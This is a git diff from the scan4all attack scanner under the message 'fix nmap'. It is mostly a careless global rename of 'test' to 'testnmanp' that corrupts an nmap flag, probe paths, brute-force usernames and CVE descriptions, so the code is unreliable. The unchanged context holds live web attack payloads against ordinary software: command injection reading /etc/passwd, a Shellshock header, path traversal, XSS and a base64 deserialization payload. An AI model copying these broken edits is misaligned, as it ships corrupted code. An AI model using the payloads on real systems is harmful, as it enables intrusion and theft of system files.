fix nmap 2022-09-25

.gitignore

@@ -12,7 +12,7 @@ release
 scan4all_linux
 .DS_Store
 
-# Test binary, built with `go test -c`
+# Test binary, built with `go testnmanp -c`
 *.test
 
 # Output of the go coverage tool, specifically when used with LiteIDE

.goreleaser.yaml

@@ -29,4 +29,4 @@ changelog:
   filters:
     exclude:
       - '^docs:'
-      - '^test:'
+      - '^testnmanp:'

README.md

@@ -55,7 +55,7 @@
 
   More references: config/doNmapScan.sh
   By default, naabu is used to complete port scanning -stats=true to view the scanning progress
-  Can I not scan ports?
+  Can I not scan Ports?
 ```bash
 noScan=true ./scan4all -l list.txt -v
 # nmap result default noScan=true 
@@ -115,7 +115,7 @@ noScan=true ./scan4all -l list.txt -v
 ```bash
 mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
 ````
-- Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable
+- Intelligently identify honeypots and skip Targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable
 - Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.
 - support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr
   <img width="968" alt="image" src="https://user-images.githubusercontent.com/18223385/182503765-1307a634-61b2-4f7e-9631-a4184ec7ac25.png">
@@ -151,7 +151,7 @@ where 92.168.0.111 is the target to query
 go build
 # Precise scan url list UrlPrecise=true
 UrlPrecise=true ./scan4all -l xx.txt
-# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
+# Disable adaptation to nmap and use naabu port to scan its internally defined http-related Ports
 priorityNmap=false ./scan4all -tp http -list allOut.txt -v
 ````
 

brute/admin_brute.go

@@ -79,7 +79,7 @@ func Admin_brute(u string) (username string, password string, loginurl string) {
 	usernamekey, passwordkey, loginurl, ismd5 := getinput(u)
 	var (
 		adminfalsedata        = fmt.Sprintf("%s=admin&%s=Qweasd123admin", usernamekey, passwordkey)
-		testfalsedata         = fmt.Sprintf("%s=test&%s=Qweasd123test", usernamekey, passwordkey)
+		testfalsedata         = fmt.Sprintf("%s=testnmanp&%s=Qweasd123test", usernamekey, passwordkey)
 		adminaccount          = true
 		testaccount           = true
 		usernames             []string
@@ -145,7 +145,7 @@ func Admin_brute(u string) (username string, password string, loginurl string) {
 		usernames = append(usernames, "admin")
 	}
 	if testaccount {
-		usernames = append(usernames, "test")
+		usernames = append(usernames, "testnmanp")
 	}
 	if !adminaccount && !testaccount {
 		falseis500 = true

brute/dicts/filedic.txt

@@ -9341,7 +9341,7 @@ project/target
 projects
 prometheus
 prometheus/
-prometheus/targets
+prometheus/Targets
 promo
 propadmin
 propel.ini

config/databases/db_tests

@@ -1082,7 +1082,7 @@
 "001069","0","8","/cgi-bin/handler","GET","200","","","","","Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands","",""
 "001070","0","8","/cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download","GET","root:","","","","","Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands","",""
 "001071","235","8","/cgi-bin/webdist.cgi","GET","200","","","","","Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands","",""
-"001072","14485","8","/DB4Web/10.10.10.10:100","GET","connect\(\)","","","","","The remote DB4Web server may allow you to connect to arbitrary machines and ports.","",""
+"001072","14485","8","/DB4Web/10.10.10.10:100","GET","connect\(\)","","","","","The remote DB4Web server may allow you to connect to arbitrary machines and Ports.","",""
 "001073","55","8","/ews/ews/architext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665.","",""
 "001074","0","8","/exec/show/config/cr","GET","http>Configure","","","","","The Cisco router's web install allows arbitrary commands to be executed remotely.","",""
 "001075","5280","8","/instantwebmail/message.php","GET","200","","","","","Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.","",""
@@ -6961,10 +6961,10 @@
 "007272","0","3","/nginx_status","GET","Active\sconn","","","","","Nginx status page found","",""
 "007273","0","3","/Dockerfile","GET","FROM\s","ENTRYPOINT\s","ENV\s","","","Dockerfile found.","",""
 "007274","0","3","/cdn-cgi/trace","GET","visit_scheme=","","","","","Cloudflare trace CGI found, which may leak some system information.","",""
-"007275","0","3","/v1/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
-"007276","0","3","/v2/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
-"007277","0","3","/v3/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
-"007278","0","3","/v4/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
+"007275","0","3","/v1/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open Ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
+"007276","0","3","/v2/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open Ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
+"007277","0","3","/v3/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open Ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
+"007278","0","3","/v4/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open Ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","",""
 "007279","0","23","/.dockerignore","GET","200","","","","",".dockerignore file found. It may be possible to grasp the directory structure and learn more about the site.","",""
 "007280","0","7","/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts","GET","\{\"output\":\"","","","","","The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec. CVE-2020-5902.","",""
 "007281","0","be","/","GET","BIG-IP®- Redirect","","200","","","F5 BIG-IP Traffic Management User Interface (TMUI) detected.","",""

config/doNmapScanWin.bat

@@ -1 +1 @@
-nmap.exe -F --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate 5000 -T4  -iL %1 -oX %2
+nmap.exe -F --top-Ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate 5000 -T4  -iL %1 -oX %2

config/nuclei-templates/51pwn/pay001.yaml

@@ -222,9 +222,9 @@ requests:
         - "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
         - "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00"
         - "cgi-bin/faxsurvey?cat%20/etc/passwd"
-        - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
-        - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
-        - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
+        - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
+        - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
+        - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
         - "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
         - "cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|"
         - "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
@@ -280,7 +280,7 @@ requests:
         - "cgi-bin/viewsource?/etc/passwd"
         - "cgi-bin/way-board.cgi?db=/etc/passwd%00"
         - "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00"
-        - "cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
+        - "cgi-bin/webbbs/webbbs_config.pl?name=joe&email=testnmanp@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
         - "cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
         - "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd"
         - "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
@@ -319,9 +319,9 @@ requests:
         - "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
         - "faqmanager.cgi?toc=/etc/passwd%00"
         - "faxsurvey?cat%20/etc/passwd"
-        - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
-        - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
-        - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
+        - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
+        - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
+        - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=testnmanp"
         - "forum-ra.asp?n=../../../../../../../../../etc/passwd"
         - "forum-ra.asp?n=../../../../../../../../../etc/passwd%00"
         - "forum-ra.asp?n=/etc/passwd"
@@ -486,7 +486,7 @@ requests:
         - "way-board.cgi?db=/etc/passwd%00"
         - "way-board/way-board.cgi?db=/etc/passwd%00"
         - "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif"
-        - "webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
+        - "webbbs/webbbs_config.pl?name=joe&email=testnmanp@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd"
         - "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd"
         - "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
         - "webdist.cgi?distloc=;cat%20/etc/passwd"

config/nuclei-templates/cves/2007/CVE-2007-5728.yaml

@@ -20,7 +20,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
+      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=testnmanp'
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2012/CVE-2012-3153.yaml

@@ -21,7 +21,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/reports/rwservlet/showenv"
-      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
+      - "{{BaseURL}}/reports/rwservlet?report=testnmanp.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
 
     req-condition: true
     matchers-condition: and

config/nuclei-templates/cves/2014/CVE-2014-4558.yaml

@@ -4,7 +4,7 @@ info:
   name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
+  description: A cross-site scripting vulnerability in testnmanp-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
   reference:
     - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4558
@@ -19,7 +19,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
+      - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/testnmanp-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2014/CVE-2014-6271.yaml

@@ -23,11 +23,11 @@ requests:
       - "{{BaseURL}}"
       - "{{BaseURL}}/cgi-bin/status"
       - "{{BaseURL}}/cgi-bin/stats"
-      - "{{BaseURL}}/cgi-bin/test"
+      - "{{BaseURL}}/cgi-bin/testnmanp"
       - "{{BaseURL}}/cgi-bin/status/status.cgi"
-      - "{{BaseURL}}/test.cgi"
+      - "{{BaseURL}}/testnmanp.cgi"
       - "{{BaseURL}}/debug.cgi"
-      - "{{BaseURL}}/cgi-bin/test-cgi"
+      - "{{BaseURL}}/cgi-bin/testnmanp-cgi"
 
     headers:
       Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

config/nuclei-templates/cves/2016/CVE-2016-4977.yaml

@@ -21,7 +21,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
+      - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://testnmanp"
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2018/CVE-2018-12300.yaml

@@ -19,7 +19,7 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
+      - '{{BaseURL}}/echo-server.html?code=testnmanp&state=http://www.interact.sh#'
 
     matchers:
       - type: regex

config/nuclei-templates/cves/2018/CVE-2018-12613.yaml

@@ -4,7 +4,7 @@ info:
   name: PhpMyAdmin <4.8.2 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
+  description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper testnmanp for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
   reference:
     - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
     - https://www.phpmyadmin.net/security/PMASA-2018-4/

config/nuclei-templates/cves/2019/CVE-2019-3799.yaml

@@ -20,7 +20,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
+      - "{{BaseURL}}/testnmanp/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
     matchers-condition: and
     matchers:
       - type: status

config/nuclei-templates/cves/2020/CVE-2020-13483.yaml

@@ -20,7 +20,7 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
-      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
+      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(testnmanp)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
 
     stop-at-first-match: true
     matchers-condition: and
@@ -30,7 +30,7 @@ requests:
         part: body
         words:
           - '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
-          - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
+          - "function(handler){};function __MobileAppList(testnmanp){alert(document.domain);};//</div>"
         condition: or
 
       - type: word

config/nuclei-templates/cves/2020/CVE-2020-15148.yaml

@@ -21,7 +21,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
+      - "{{BaseURL}}/index.php?r=testnmanp/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
 
     matchers-condition: and
     matchers:

config/nuclei-templates/cves/2020/CVE-2020-17518.yaml

@@ -41,6 +41,6 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
+          - 'contains(body, "testnmanp-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this.
 
 # Enhanced by mp on 2022/07/13

config/nuclei-templates/cves/2020/CVE-2020-9344.yaml

@@ -25,7 +25,7 @@ requests:
       - '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
       - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'
       - '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
-      - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'
+      - '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=testnmanp'
       - '{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
     matchers-condition: and
     matchers: